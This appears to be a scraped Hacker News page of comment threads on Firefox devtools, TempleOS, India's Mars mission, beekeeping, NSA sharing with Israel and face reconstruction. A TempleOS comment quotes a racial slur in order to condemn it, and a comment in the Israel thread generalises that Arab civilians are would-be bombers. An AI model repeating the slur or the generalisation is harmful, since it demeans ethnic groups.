geekam 2 days ago 0 replies      
Finally, the storage manipulation has arrived. Now I can get rid of Firebug completely.
ck2 3 days ago 1 reply      
I'm more excited about this coming in the next version(s)



Back in August they were debating enabling by default in November but it is probably not ready for prime-time yet


gioele 3 days ago 2 replies      
How big are the developer tools compared to the rest of Firefox? 5% of the total size? 10%?

Can't the more sophisticated tools be split into a separate extension, leaving only some basic things in the distributed package?

arenaninja 3 days ago 0 replies      
Sweet, sweet console.table()! I've never been happy with the way that console.log works for objects/arrays, I'm eager to use this one
kolev 3 days ago 0 replies      
This is great! Firefox Aurora has been my main browser for over 6 months and now these great improvements will keep the status quo for me!
iSnow 3 days ago 0 replies      
Oh, this is neat. This is probably the first time the built-in debugging tools make me think about ditching FireBug.
ux-app 3 days ago 0 replies      
Great to see the iframe switcher. Was such a pain to manually switch the context between top and child frames.
vvh 3 days ago 0 replies      
good list of tools, thanks!
Gonzih 3 days ago 1 reply      
arahaya 3 days ago 0 replies      
TempleOS: 5 minute random code walkthrough
357 points by GuiA  3 days ago   168 comments top 33
Mithaldu 3 days ago 1 reply      
These videos already make me inordinately happy, because everything about templeos is beautiful, and having it explained is so very nice. However the most beautiful take-away from these videos to me is that Terry has a bird. :)
chippy 3 days ago 3 replies      
I want to build in some kind of primitive networking into this OS - just so one machine can talk to another... it's on my side project list. Anyone had much experience with the code?

Also - Love the positive comments in this thread. Proud of this community.

M4v3R 3 days ago 5 replies      
It makes me sad that even with his illness he delivered more working code than I probably will ever do. Maybe not because I can't, but because I procrastinate so much and I really have a hard time focusing on doing work.
microcolonel 3 days ago 0 replies      
I had a conversation with Terry on freenode a couple years ago, back when TempleOS was "losethos".

I was convinced, given the context, that losethos was just computer malware, and he had a hard time articulating why it wouldn't be, and ended up just getting frustrated at the most cursory of questions.

A few days later, somebody who had witnessed the conversation informed me that he was a well known probable schizophrenic, and it really bummed me out that I didn't know or handle the situation better.

While he hasn't convinced me of anything other than that having nice uniform names for types can be helpful(U64, S64, F64, etc.), that conversation gave me some perspective on what it means to be schizophrenic.

userbinator 2 days ago 1 reply      
What makes this amazing is that Linus Torvalds probably wouldn't be able to pick a random piece of code in the Linux kernel and do this.

The fact that it's quite featureful for an OS of ~100kLOC - including an assembler and compiler for a language with some OOP - makes this even more interesting. "The shell is a compiler/interpreter" concept somewhat reminds me of Lisp machines too.

Igglyboo 3 days ago 0 replies      
This guy never ceases to amaze me, he's insanely smart and dedicated.
orbifold 2 days ago 1 reply      
One concept I really like is to just identity map the whole address space and run everything with full privileges. With a sufficiently high level memory safe language with good concurrency and memory regions support, you should be able to statically enforce most of the guarantees that the hardware provides and at the same time get rid of context switches. Untrusted code in a memory unsafe language would simply run in a VM.
andrewljohnson 3 days ago 2 replies      
Random numbers coming from God is cute. I'm not a theist, but I also feel awe of the elusive concept of true randomness. I read something about this from him before, and it pops up in the 1st video.

The flashing Menu button and marquee filename are interesting. A distraction to most people, but I wonder if they help the author Terry stay focused.

sitkack 3 days ago 0 replies      
The world is definitely better off with Terry. Thanks man and keep on doing your thing.
incision 3 days ago 1 reply      
Neat, subscribed.

I make a point to read TempleOS' comments. Looking past the frequent nastiness they're sometimes interesting and even poetic, in a way that's as sadly familiar as the intonation in these videos.

tlo 3 days ago 4 replies      
Can somebody explain in a few words what TempleOS is?
callahad 3 days ago 1 reply      
I love the idea of a built-in hotkey for jumping to a random line across the entire codebase. Like a fuzzer, but for your understanding of your project.

...and now I really want to write a vimscript to do the same.

codezero 3 days ago 0 replies      
I actually like the idea of having to pick a random routine in a large codebase and then explaining it on the fly. Terry does a pretty good job at this, he's done similar things in other videos.
curiousDog 3 days ago 3 replies      
As much as I appreciate what he did (most of us wrote a bare bones OS in school anyway), I'm not a fan of his racist comments. Some are incredibly specific like "I can't believe a nigger is the boss of a white guy, that just isn't right" or something like that. It's like he has these thoughts actually bottled up but cannot control them because of his illness. Nonetheless, my bad to rain on someone with such an illness. All the best to him.
qznc 2 days ago 0 replies      
I like the idea for quick impromptu presentations, so I made a script for git: https://github.com/qznc/dot/blob/master/bin/git-randomline

$ vi $(git randomline)

Then explain to someone in five minutes

LukeB_UK 3 days ago 1 reply      
All the flashing bits and marquees... I never thought that someone could create an OS that reminds me of GeoCities
cmdrfred 3 days ago 2 replies      
I hope medical science can one day find a way to help our friends like Terry find their way home. Until then all we can do is let him know that he is loved and respected by his peers, Terry you are one of us.
broken 2 days ago 1 reply      
"showdead -> yes" is the only reason i have a HN account.
gojomo 3 days ago 1 reply      
What if the giant computing platform battle of 2040 is TempleOS vs. Urbit, because everyone else got neurobricked by the iBrain/mindroid 0day of 2034?
ivans__ 3 days ago 0 replies      
Terry is always a huge inspiration to me!
donatj 2 days ago 0 replies      
A little over a year ago I wrote a post about the problems I saw in Coffeescript, Terry commented that switching to TempleOS would prevent my complaints as I could use his C variant. Made my day to have him comment.
no_future 3 days ago 1 reply      
Terry is a goddamn hero and an inspiration to us all
axaxs 2 days ago 0 replies      
I'd just be happy for a usable Holy C. Growing up in the south, I can perhaps sadly deal with the political or racist rants. Putting that aside, I think the man is a genius who has much to offer the world. I'd love for someone like this to mentor me, though such a thing is hard to find outside academia.
desireco42 2 days ago 0 replies      
After looking at some of the videos and intro, he is onto something with this. You can always run this in a VM, I can see how permissions and ownership can get in the way. By using subroutines, he gets every ounce of juice out of his machine. Also the document format, based on his description, sounds awesome.
smegel 3 days ago 0 replies      
If nothing else, this guy's got staying power.
thaumaturgy 3 days ago 1 reply      
Does anyone have the code for the PRNG handy, or is familiar with it? It'd be kinda neat to see how that bit works.
MarkPNeyer 3 days ago 0 replies      
I've been through a lot of psychosis and feel like I can understand this guy. I had a psychotic break in late 2012 and thought strongly that Catholicism was created to teach the world computer science concepts.

When you start reading about Roko's basilisk, it's not a stretch at all to imagine that primitive human beings exposed to an artificial intelligence would think of it like 'god'.

namecast 3 days ago 1 reply      
Shine on, Terry, you crazy diamond.

If nothing else, TempleOS is a testament to how much one programmer can accomplish absent feedback or collaboration from others. For better or worse.

Davesjoshin 3 days ago 6 replies      
How come his rants have a lot of racial slurs? Am I missing something? http://www.templeos.org/Wb/Accts/TS/Wb2/Rants/TAD/2014/09/Ra...
elwell 3 days ago 1 reply      
Let's all hope Terry doesn't learn AI enough to equip TempleOS with the ability to learn (as well as networking). There's no guessing as to what a randomized OS with a god-complex might do.
cmdrfred 3 days ago 2 replies      
What if he's right?
cschep 3 days ago 3 replies      
Whhhaaaaat the hell? Is this real?
One Thing Well A weblog about simple, useful software
365 points by tete  4 days ago   46 comments top 16
Argorak 4 days ago 1 reply      
This tumblr doesn't quite live up to its name: http://onethingwell.org/post/97725615916/busybox

BusyBox is great and everything, but it's definitely not subscribing to the "One Thing Well"-philosophy, quite the contrary: everything in one.

asymmetric 4 days ago 1 reply      
OT, but it's heartening to see a link to an RSS feed next to Twitter and G+. I find that more and more sites are abandoning this public, open source standard in favor of proprietary platforms.
state 4 days ago 3 replies      
Sorry, but there is nothing I find more annoying than the "Never miss a post!" spam that Tumblr now inserts in to every page post acquisition.

Perhaps someone could do one thing well and come up with a blogging platform for this nice project?

eps 4 days ago 0 replies      
11 pages of Windows software! Who would've thought it exists :)


tete 4 days ago 0 replies      
Disclaimer: Not my blog, but found it today and really loved it.
fizixer 4 days ago 1 reply      
- See also: suckless.org

- An LFS build off kernel.org (the kernel) and github (the rest of userland) would be an interesting experiment.

juef 4 days ago 0 replies      
denizozger 4 days ago 0 replies      
I love the idea but not the implementation. Categorising software according to purpose and tech stack would be the best.
tretiy3 4 days ago 1 reply      
Very good. Is there any way to subscribe (no count tumblr rss twitter)?
alanning 4 days ago 0 replies      
Short examples would greatly enhance comprehension for me
nXqd 4 days ago 0 replies      
This site could be named unix_hunt :D
zomg 4 days ago 0 replies      
the original "product hunt"! :)
doctorpangloss 4 days ago 3 replies      
> Simple, useful software

I came expecting examples of to-do lists, mail clients, clever messaging apps, etc. There are a handful of those.

Instead, the majority of apps are described by sentences where literally every word would be unfamiliar to a typical computer user. For example, "Cram is a functional testing framework for command line applications based on Mercurial's unified test format."

Simple is in the eye of the beholder.

Why India's Mars mission is so cheap and thrilling
386 points by leephillips  1 day ago   161 comments top 17
zizee 1 day ago 9 replies      
Why do people always pass judgment on spending on things they don't agree with as if the money is destroyed? It's not like they pile all the cash onto the rocket and send it to space.

Let's just forget for a moment that valuable skills and infrastructure are being created for India in this process and look at where the money is going.

A large proportion of the expense of this mission goes to paying the wages of domestic scientists and engineers in India. This money will in turn get taxed and spent by the recipients and pumped back into the local economy.

As far as I can see it is a win win win.

someperson 1 day ago 5 replies      
(I posted a similar comment a few months ago.[1] To be clear I have nothing against the India, its space program or its achievements, but it's impossible to discuss the low price of the mission without discussing the elephant in the room)

There is a clear lack of sterilization techniques being used on the ISRO spacecraft. This is clearly visible in the public photos and videos. NASA spends a great deal of time sterilizing deep space probes to reduce the chance of Earth microbes colonizing a place like Mars, or a moon of Jupiter, but ISRO does not.

Watch this video showing assembly of this particular spacecraft http://www.space.com/23199-indias-first-mars-mission-prepare...

Compare the NASA cleanroom assembling Curiosity - http://www.nasa.gov/centers/jpl/images/content/482654main_pi....

Most engineers at the Indian Space Research Organisation seen directly operating on the spacecraft are not using facial masks or even gloves for interplanetary missions, let alone full cleanroom coveralls. http://www.thehindu.com/multimedia/dynamic/01608/vbk-05-mars... via http://www.thehindu.com/sci-tech/science/indias-october-28-m...

It would be a huge shame for us to have doubt whether the first extraterrestrial microbes we find in the solar system were really alien or simply Space Age Earth based life.

It also jibes with this anecdote https://news.ycombinator.com/item?id=6552078

  This comment has nothing to do with India, ISRO, politics or Mars, but I am curious if anyone with expertise can comment on the clean room practices seen applied in this video. Is it odd that the workers don't have on full 'bunny' suits and have (what seems to be) a relatively large amount of skin/hair unprotected? I don't know if it matters that much, it just seems a little lax given the cost of failure.

  Firstly, I've visited ISRO Bangalore (a few years back). And I did see the exact things you mentioned. I did ask the guy (not sure if he was the PR guy) who took our class for the tour. His answer was, they were likely assembling some test equipment and not the real equipment that was going to space.

  (Which is unlikely given parent's NYT article:)

  The modest budget did not allow for multiple iterations. So, instead of building many models (a qualification model, a flight model and a flight spare), as is the norm for American and European agencies, scientists built the final flight model right from the start.

It's unclear whether the room is a climate and particulate controlled cleanroom up to the standards required for interplanetary probes, but they may (hopefully) do sterilization through chemical and heat treatments - but that alone isn't enough for planetary protection.

[1] https://news.ycombinator.com/item?id=7964261#up_7964499

tn13 1 day ago 0 replies      
In the words of Vikram Sarabhai, the founding father of ISRO:

    "There are some who question the relevance of space activities in a developing nation. To us, there is no ambiguity of purpose. We do not have the fantasy of competing with the economically advanced nations in the exploration of the moon or the planets or manned space-flight."

    "But we are convinced that if we are to play a meaningful role nationally, and in the community of nations, we must be second to none in the application of advanced technologies to the real problems of man and society."

gphilip 15 hours ago 0 replies      
Eight months back, three scientists from ISRO did an AMA on /r/india where they answered a lot of interesting questions and provided good insights into the good, the bad, the hopes and the struggles at ISRO and of being a scientist in India. That AMA will likely answer many of the questions here about ISRO and its operations. For instance:

"All nations wanting to launch to Low Earth Orbits at low costs approach us. Germany, France, Israel, Norway, Denmark, Italy are examples. Yes, despite ESA. Because PSLV is a cost effective and reliable launch vehicle for launching to LEOs."

And of course, Reddit being what it is, there were cute questions and answers as well. Sample:

Qn: "Let's face it. You're definitely "cool" now. Were you "cool" growing up? How was your school/college life in general? Do women dig ISRO scientists?"

Scientist 1: "Oh yes, cool all the way. I don't know about other scientists but they sure dig me."

Scientist 2: "He's kidding. I know for a fact that he is more single than Lance Armstrong's nut."

More here: "We are three ISRO scientists here to answer your questions -AMA" http://www.reddit.com/r/india/comments/1ujcmo/we_are_three_i...

stcredzero 1 day ago 2 replies      
I hope India and China pull off a Mars Direct style mission and beat the US to Mars. The US needs another "Sputnik Moment" to get itself going in space again. I mean for real, not as an esoteric form of federal "pork."
paramendra 1 day ago 3 replies      
The pride in India right now is as if it won the World Cup.
mdemare 16 hours ago 0 replies      
To all those cynics who bitch about the price of this space mission: this mission cost $74M in total. India has a population of 1252M, and a per capita income of $1500.

That means that after paying for this mission to Mars, Indians have still $1499.40 left to spend on other things.

Now stop bitching.

bipin-nag 19 hours ago 1 reply      
There are many points of view that one could (should) factor in to explain the circumstances:

1. Mindset due to poverty: There are many people below the poverty line so it makes sense for the scientific programs to aim for the cost-effective solutions not cutting-edge.

2. Experimental: If it was your first space mission, you wouldn't exactly load it with gadgets. Missions have a chance to succeed or to end in failure. Investment would only make sense after tasting some success.

3. Cost of living: If you are well-off in India, you may still be poor outside of India. Cost of living is lowest in India (http://www.numbeo.com/cost-of-living/rankings_by_country.jsp). So cost of research and development will be lower than elsewhere too(maybe not everywhere).

4. Media attention (somewhat): It started with the headlines from British news "We pay for India's rocket to Mars" which raised a lot of eyebrows in India. Even though money from aid was used for its intended purpose, it was questioned if India needed the aid. (To me it's not worth the brouhaha. They will fancy paying for nuclear programmes next.)

5. GDP: US GDP is the largest in the world. They can afford to spend loads of money without worrying (let's say the debt crisis was an exception). India has a GDP which is smaller by orders of magnitude.

sid1992 1 day ago 1 reply      
Go to ISRO's website and look at the starting salary for an engineer. Even for the most paid fields there it is not more than 40000 rupees per month or roughly 650 dollars
jgmmo 1 day ago 2 replies      
"They've kept it small. The payload weighs only about 15kg. "

Whoa... So basically that whole mission was for 30ish pounds of actual 'useful equipment' in orbit?

mataug 1 day ago 0 replies      
It feels like they've built a startup, put only the essential things in and built a truly minimum viable product that works, and that too quite well.
Rapzid 1 day ago 0 replies      
I believe this could be very good for India on multiple fronts.. But I feel the comparison to NASA's spending is somewhat superficial and borderline disingenuous.
chintan39 19 hours ago 0 replies      
I think it's because Indian organizations know how to utilize their resources efficiently.
idreams 16 hours ago 1 reply      
proud to be an Indian!!
kazinator 1 day ago 15 replies      
How about reliable electricity and water for your people, then Mars.


"Water supply and sanitation in India continue to be inadequate ..."


"Over 300 million (300 million) people in India have no access to electricity. Of those who do, almost all find electricity supply intermittent and unreliable."

peter303 1 day ago 0 replies      
Indian labor is very cheap. Even cheaper in the Motherland.
vithlani 1 day ago 3 replies      
I wish someone would write a headline like:

"Why 750 million Indian citizens cannot enjoy basic sanitation facilities after 60 years of gaining so called independence of their nation"


Loyalty Nearly Killed My Beehive
351 points by dnetesn  3 days ago   108 comments top 24
mudil 3 days ago 2 replies      
I started beekeeping 2 years ago, and I cannot be any happier about this hobby. It's easy and fun. Bees do not require feeding, cleaning, just an occasional check up. And they give my family the best honey the money can buy.

To start, I read (believe it or not) Beekeeping for Dummies (http://www.amazon.com/Beekeeping-For-Dummies-Howland-Blackis...). It's a well rated book, and it has all the basic info. Then I watched various YouTube videos.

Then I ordered the following list of supplies. (I buy all my equipment from Mann Lake. $100+ it's free shipping. http://mannlakeltd.com/)

This is a list I recommend:

Note that the hive boxes and frames, are unassembled. Mann lake does have assembled hives. Assembly is easy, and I did it with my kids.

1) WW-605_b Med Hive Qty. 5
2) FR-811 Med Frames Case of 10. Qty. 5 (so you get 50 frames)
3) CV-305 Suit - economy - Medium (Buy YOUR size.) Qty. 1
4) HD-540 Smoker Qty. 1
5) CL-620 Economy cowhide leather gloves (Buy YOUR size. This is small) Qty. 1
6) HD-210 7D Nails (1lb) Qty. 1
7) HD-220 Frame Nails Qty. 1
8) HD-620 Hive tool
9) HD-660 Bee Brush
10) WW-310 Bottom Board
11) Your choice of top cover (buy with Inner cover)... http://www.mannlakeltd.com/beekeeping-supplies/page29.html

I practice foundationless but some prefer not to deal with the cross comb headaches and use foundation. Foundation part number is (FN-720).

I adopted my hive from Jack at Los Altos Honey Bees (http://losaltoshoneybees.wordpress.com/). He goes and rescues feral colonies.

I also joined Beekeepers' Guild Of San Mateo County (http://www.sanmateobeeguild.org/). The club is great: the mailing list discussions keep me informed about things to do right now, and what to do to prepare for upcoming seasons.

radicaledward 3 days ago 3 replies      

Just in case anyone read the first paragraph and thought, "Hey that's a good idea!" Honey contains bacteria that causes infant botulism [1]. Once a child has a more fully developed digestive system, this is no longer a problem.

[1] http://en.wikipedia.org/wiki/Botulism#Infant_botulism

SEJeff 3 days ago 4 replies      
Absolutely fascinating article. I'm really glad that HN contains the occasional non-tech related story. It seems somewhat obvious how an engineering mindset transfers very well to other disciplines, and unbeknownst to me, beekeeping is one of them.
flatline 3 days ago 2 replies      
> Queens typically live for about four or five years

This figure is from an old study that others have repeatedly failed to reproduce. More recent attempts to determine queen longevity have shown they live to an average of about a year, and furthermore failed to find any of significantly advanced age. So it shouldn't be too much of a surprise that she only lasted a season. Since there seem to be a few beekeepers hanging out here, I'd be curious to hear anecdotal evidence of queen lifespan.

Qworg 3 days ago 3 replies      
If you like this story, I'd unabashedly recommend that you try and keep bees. They are relatively low maintenance, interesting to observe and fun to debug (no pun intended). Success is amazing - both to eat and think about.

The other benefit is psychological - beekeeping requires an almost zen like approach when dealing with the hive. You cannot get angry or flustered, even when surrounded by thousands of bees desperately trying to sting you. You have to focus, be calm, and do the work.

MechSkep 3 days ago 2 replies      
One of my side projects is building a sensing electronics package to monitor the health and activity of beehives. The idea is to make it easier for someone just starting to maintain their hive.

Any one have feedback on the concept? Or features we haven't thought of?

k_sze 3 days ago 1 reply      
I'm a huge fan of ants, bees, and wasps, but I have never kept bees, only ants. There is something I don't understand.

Is there any rational advantage to keeping the beehive alive between the two queens, especially since the new queen is probably only remotely related in terms of genealogy? Is it just so the production of honey, propolis, etc remains uninterrupted? What happens if you let a beehive completely die and then put in a new queen? Would the beehive become too filthy for the new colony to develop easily?

Or does the author's wish to keep the beehive alive only stem from emotional attachment?

qwerta 3 days ago 1 reply      
I never heard of replacing queens; the beehive always raised a new one. But perhaps there are different methods in Europe.

I have a good story to share: we had 10 beehives at a cabin in the middle of the woods and one of them got stolen! We moved the remaining ones across the town to a safer location. Carrying 100 pounds, of which 40 pounds are live bees, is quite something :-)

csorrell 3 days ago 2 replies      
This is why I always recommend new beekeepers start out with at least two hives. If the author had another healthy hive, he could have moved a frame of young brood to his queenless hive and they would have raised a new queen on their own.
jackgavigan 3 days ago 1 reply      
There's a whole industry around renting beehives to farmers to pollinate crops: http://www.scientificamerican.com/article/migratory-beekeepi...

There's an interesting supply'n'demand thing going on as a result of the decline in the bee population, coupled with the growth of almonds as a cash crop: http://scientificbeekeeping.com/2012-almond-pollination-upda...

gresrun 3 days ago 0 replies      
My friends are currently serving as missionaries in Tanzania and are teaching the art of beekeeping to help diversify the local economy and diet: http://makondefrasers.wordpress.com/
hiharryhere 3 days ago 0 replies      
Great article, well written and fun. Though how is nobody weirded out by him just leaving his hive on the roof of an apartment he no longer lives in. What a hilarious dude.
S_A_P 3 days ago 1 reply      
So is there any truth to the "africanized/killer"(I dont know any other way to state it but I dont like the term) bees being more difficult to manage and more aggressive? I live in Texas where they arrived in the early 1990s. I would be leery of keeping bees that were not as docile as the european variety. I am not too worried about getting stung once or twice, but I have heard that the "killer" bees go ape shit once the stinging pheromones have been released and you can get stung hundreds of times in a short time span.
Nanzikambe 3 days ago 0 replies      
A beautiful article, makes me yearn for that recent-convert's enthusiasm for a new hobby. Reminds me of when I first took up mycoculture. Perhaps I'll get a beehive and join the legion of "that guy" :
beginrescueend 3 days ago 0 replies      
Great article!

We're on our 3rd season beekeeping; we just collected honey, last night.

In fact, I got my first ever bee/wasp/hornet sting ever, last night, from one of our bees. I was being sloppy, wearing running shoes under my bee suit, instead of boots. It hardly hurt at all, though. (I've had worse mosquito bites; so far, horseflies are the worst bites/stings I've ever had).

We captured our first swarm, this year, and got another hive "for free." Woo hoo!

As far as ordering stuff, since somebody mentioned it, we just go to http://www.beekeepers.com/ to get our gear, since our local farm stores don't carry much.

I am interested in these projects, so I can get my bee geek on, but I don't know if I should commit the time and money to them (any success stories out there)? http://www.opensourcebeehives.net/ http://opensourceecology.org/wiki/Beekeeping http://openenergymonitor.org/emon/node/102

mathattack 2 days ago 0 replies      
"Undeterred, I installed the bees on the roof of my Brooklyn apartment and began the absurd process of learning how to keep them alive. Incredibly, they flourished, and by October I had perhaps 70,000 bees..."

That has to make one unpopular with the neighbors.

ncourage 3 days ago 1 reply      
I don't know why I didn't expect this, but this article was the most interesting thing I've read all day. It made me almost feel compassion for the bee hive by my mailbox (if you can call it that), in a hole in the grass. We've tried to be rid of them.
orenjacob 3 days ago 0 replies      
For those interested, Beekeeping For Dummies (http://www.amazon.com/dp/0470430656) is actually quite a good way to start. We've had our queen replaced by our swarm and it was quite an amazing thing to witness. Our hive/swarm gave more than 40 pounds of honey a year and we kept our whole street well fed with local honey for a few years. And my garden almost doubled in productivity once the bees were in place. A win all around. Sadly a family member developed an allergy so we had to discontinue keeping bees, but it was amazing while we had them and I strongly recommend keeping bees to anyone interested.
andyl 3 days ago 0 replies      
I have two hives in the yard. (Palo Alto) We produce 10-20 gallons of honey per year. Fun to harvest - kids love to get hands-on. Fun to give away esp to random strangers.
brianbreslin 3 days ago 2 replies      
My biggest fear of putting a beehive in my parents yard is that it would result in my dog getting stung or my parents.
Elzair 3 days ago 1 reply      
Is Colony Collapse Disorder largely affecting only domesticated beehives?
Thesaurus 3 days ago 0 replies      
I can't believe I read that whole thing, it was written so well. Quite informative and very interesting.
hywel 3 days ago 2 replies      
Kept waiting for this to turn out to be an allegory about a startup.
McDoku 3 days ago 2 replies      
This is so meta.
Israel's N.S.A. Scandal
341 points by not_that_noob  2 days ago   128 comments top 12
CamperBob2 2 days ago 3 replies      
Instead of being buried at the end of the article, Bamford's penultimate paragraph

   In Moscow, Mr. Snowden told me that the document    reminded him of the F.B.I.'s overreach during the days    of J. Edgar Hoover, when the bureau abused its powers to    monitor and harass political activists. "It's much like    how the F.B.I. tried to use Martin Luther King's    infidelity to talk him into killing himself," he said.    "We said those kinds of things were inappropriate back    in the '60s. Why are we doing that now? Why are we    getting involved in this again?"
... should be cut-and-pasted into any comment thread where a security-state apologist is trying to make people believe that Snowden is anything other than a patriot.

We can't fix this by working within the system. That's what the Church Committee tried to do. They failed. There is no reason to think their twenty-first century counterparts will not fail again.

jostmey 2 days ago 2 replies      
I think this is the most damning leak to date. There is no justification for freely giving information to Israel. And the part about people's porn habits being tracked is even scarier. That could be used to discredit virtually anyone (well, any male at least). Who hasn't visited an embarrassing porn website at least once in their life? Now imagine your name being publicly associated with that website.
guelo 2 days ago 2 replies      
The way Israel owns American military and foreign policy should be a national shame. Reminds me of this other story about Israel going behind Obama's back to get weapons straight from the Pentagon. http://online.wsj.com/articles/u-s-sway-over-israel-on-gaza-...
rrggrr 2 days ago 0 replies      
This was not a one-sided trade. You can be sure the NSA received similar feeds from Israel on targets of great interest to US national interests. The inherent problem in these NSA debates is the inability of the NSA or policy makers to give the American people believable metrics that describe the value received for the effort. Could it be the US received important intel in return for its feeds? Yes. By not articulating a believable ROI on collection or sharing, it looks increasingly like there wasn't one.
autism_hurts 2 days ago 2 replies      
Palantir has their hand in all of this.
BugBrother 2 days ago 0 replies      
A discussion of Unit 8200 I read today: http://strategypage.com/htmw/htintel/articles/20140923.aspx

(I read other sources because my Swedish media is like some inverse of Fox News. Stories like that Hamas had admitted murdering the three teens that started the last war are not... emphasized. The biggest morning newspaper didn't even mention that the accused murderers of those teens died in a firefight today. Pallywood was never mentioned. Nor torture between Palestinian groups. Etc.)

javajosh 2 days ago 0 replies      
I think this all is going to take time to sink in, but in the end, Americans will do the right thing, which has been the overwhelming trend in the past. Think slavery. Think women's suffrage. Think civil rights. Think gay marriage.

This one is a little tough because the targets are unsympathetic and the anecdotes of specific harm are non-existent. It's difficult to argue against fighting dirty as a principle; it's much easier when you can point to a specific person (like MLK) and say, "That dude was clearly wronged."

I wish it was different. I wish people got more upset about government fighting dirty against anyone[1], even against the enemies that we ourselves agree are despicable and evil. Fighting dirty hurts us far more than it hurts them, because it damages our moral identity.

[1] The one exception is if there is an existential threat to the US. However, terrorism has never been, and will never be, an existential threat to the US[2] - except insofar as, in a fit of epic but unfunny irony, they manage to manipulate us into destroying our own moral fabric.

[2] The same argument applies to Israel. Israel playing dirty against state actors like Iran would be far more defensible, because Iran really could wipe Israel out.

not_that_noob 2 days ago 4 replies      
Why was the title changed? Here's the operative paragraph from the article below - there is a document that indicates the NSA is spying on porn visits of ordinary Americans to use against them in intimidation for exercising their rights to free speech. It doesn't get any worse than this.

"It should also trouble Americans that the N.S.A. could head down a similar path in this country. Indeed, there is some indication, from a top-secret 2012 document from Mr. Snowden's leaked files that I saw last year, that it already is. The document, from Gen. Keith B. Alexander, then the director of the N.S.A., notes that the agency had been compiling records of visits to pornographic websites and proposes using that information to damage the reputations of people whom the agency considers 'radicalizers' - not necessarily terrorists, but those attempting, through the use of incendiary speech, to radicalize others. (The Huffington Post has published a redacted version of the document.)"

[Edit] For reference, the original title was: "NSA spying on porn visits of ordinary Americans" - which is exactly what they seem to be doing.

rasz_pl 2 days ago 1 reply      
> it would first be minimized, meaning that names and other personally identifiable information would be removed.

minimized?? I'm pretty sure he meant anonymized

shna 2 days ago 0 replies      
Sounds like the U.S. has not been a sovereign country for some time. Its intelligence service has been working for another country, passing sensitive information of its own citizens to Israel. Interesting. Even more interesting is that the bulk of the comments are on something else: whether this is a witch hunt or not, if it resembles what Mr. Hoover did or did not do, if the committee in the past succeeded or not.
ronreiter 2 days ago 2 replies      
The US is a close ally of Israel for obvious reasons. Israel wants to better defend itself, so it co-operates with the N.S.A. This is what Israel needs to defend itself, and Israel probably does the same thing to help defend the US.

There will always be a conflict between privacy and security; you can stick to one at the expense of the other, but you will never be able to "fix" things.

bengrunfeld 2 days ago 3 replies      
Israel's Arab civilians regularly attempt to blow themselves up in public places (believe me, I've stopped a few of them myself). Meanwhile the Palestinians gleefully lob rockets at populated cities in Israel. Of course Israel would want to monitor them as much as possible, and corroborate with the NSA to get as much data as possible. If that monitoring saved YOUR child from getting blown up on a bus, wouldn't you support it, or would you prefer your kid gets blown to smithereens so that social justice can be upheld? There's a big difference between America's domestic surveillance program and Israel's. Last time I checked, the central USA hadn't just recently been shelled.
Total Moving Face Reconstruction
308 points by mxfh  3 days ago   94 comments top 18
bsenftner 2 days ago 2 replies      
I run a startup specializing in this space called the 3D Avatar Store (www.3d-avatar-store.com).

3D Reconstruction of human faces is literally on the edge of mainstream. I'm betting on it, personally.

Our system is similar to theirs, but more general: we laser scanned 300,000 real people and then associated each laser scan with dozens of photos of that person taken from different angles, lighting conditions and expressions. That data set was then used for neural net training - actually a pipeline of neural nets.

We can accept 1 photo and get back a good quality 3D model, or a series of photos and get better quality, or HD quality video and get back frame by frame, in expression reconstructions just like their solution. In fact, our system is able to recover 36 people per video feed in real time, as well as handle 4 video feeds at once. We don't need as much reference information as they do, because we trained our system to generally understand the human facial form, rather than their solution that operates in isolation for a single reconstruction operation.

Our current system is targeted as a WebAPI for games and serious simulations - enabling 3rd parties to implement "put yourself in the game" functionality. As such we have 3 different geometry outputs aimed at game/simulation developers. We also do facial recognition, and we have a special "forensic" output for that.

Our current "best output" is purposely "Pixar like" rather than realistic. Taking them realistic tends to freak people out - especially women (seems like our culture has trained women to have an idealized self image, and when presented with their non-mirror true form, they don't like it.)

You can learn more at these links:
https://3d-avatar-store.com/Web-API-Features-May-2014
https://3d-avatar-store.com/3D-Avatar-Creation-walkthru
https://3d-avatar-store.com/New-Face-Finder

phkahler 2 days ago 2 replies      
I like that they show cases where it has problems. It's very much "here's what we can do, and here's where it doesn't work." There is no hype, no claims of "novelty", no speculation on uses, just results. I wish this were far more common.
hunvreus 3 days ago 2 replies      
Can't help but think of "The Running Man" watching Schwarzenegger's face being rendered in 3D.

It's terrifying to think that in the next 5 to 10 years we won't be able to distinguish a forged, high definition video of pretty much anybody.

anigbrowl 3 days ago 4 replies      
Somewhat off-topic, but I wonder why facial recognition/modeling experts seem to persistently ignore ears and jawline. As someone who works in film and does some picture editing (though it's not my primary skillset), ears are just as individual as other parts of the face, and they're one of the trickiest things for makeup artists to work on. As CG in movies and videogames keeps improving, my suspension of disbelief is often broken by noticing problems with the ears, eg watching a CG anime film and noticing that everyone has the same ear shape.
sabalaba 3 days ago 1 reply      
3D reconstruction is used in state-of-the-art facial recognition as well.[1] Essentially you reconstruct the face in 3D, rotate the 3D model to the front, project it back into 2 dimensions, and then feed it through a CNN with deep architecture. Because this gives you very good alignment, you can do tricks like not having shared weights across the entire image. That is, each section of the input vector is known to correspond to a certain part of the face and thus can learn unique parameters that are well suited for that specific region.

The paper claims that it takes about 105 seconds to render a single frame. So one second of 30 fps video would take about 52 minutes to render. I would have to read more in depth to see what kind of savings can be had by sharing information across frames. (The paper also doesn't mention the use of GPU acceleration.)

[1] https://www.facebook.com/publications/546316888800776/

daniel_reetz 3 days ago 2 replies      
I'd like to ask the authors how they managed to do such great/natural looking reconstructions of the eyes. Eyes are tough because they're naturally specular, transparent in places, and refractive.
macca321 2 days ago 2 replies      
I think I'm missing the point. Why are all the reconstructed videos from the same angle? It would demonstrate it better if they repositioned the camera.
Harshit15 2 days ago 0 replies      
This can help a lot in recreating the faces of avatars in animated movies and games. They have a tough time tracking facial details using small markers. I was wondering about using shadow and shine removal to solve the issues shown at the end. An example is implemented by these autonomous car designers, detailed as shadow correction: http://www.igvc.org/design/2013/US%20Naval%20Academy.pdf
imaginenore 3 days ago 4 replies      
This kind of advancement is one of the reasons I don't post photos of myself online. In a few years we will be capable of making videos with anybody's face replaced with anybody else's. It will be trivial to produce a fake video that can cause all kinds of legal troubles.

And yes, I realize it's even possible now, but with all the new algos and software coming out it will be easy enough for somebody to just mess with people's lives for fun.

aresant 3 days ago 0 replies      
Technology like this makes me wonder how long of a shelf-life video "evidence" has.

Or perhaps these same algos will also provide utility in detecting / decoding "fakes", sort of like edge-tracking / error level analysis etc today.

tantalor 2 days ago 0 replies      
